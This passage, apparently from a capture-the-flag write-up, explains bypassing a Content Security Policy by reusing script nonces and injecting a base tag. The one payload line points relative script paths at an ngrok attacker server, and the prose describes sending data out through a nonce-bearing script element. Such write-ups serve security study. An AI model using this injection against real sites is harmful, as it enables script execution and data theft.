We can make use of the nonce in these script tags - these scripts will always be executed, because the CSP allows them based on their nonce.
If we change the base URI of the page to our own attacker server, then these relative paths will now load scripts from our server, which is otherwise not possible due to the CSP.
<base href=//351b-42-60-216-15.ngrok.io>
The relative paths are now URLs under our attacker server, so if we simply host a file /static/page.js and enable CORS on our server, then we could execute arbitrary JS through this file.
In order to exfiltrate data, we still need to bypass the CSP once again. This is much simpler, now that we know the nonce. We could simply create a new script element and add the appropriate nonce obtained from the rest of the script tags. The script source can then be set to the data we want to exfiltrate.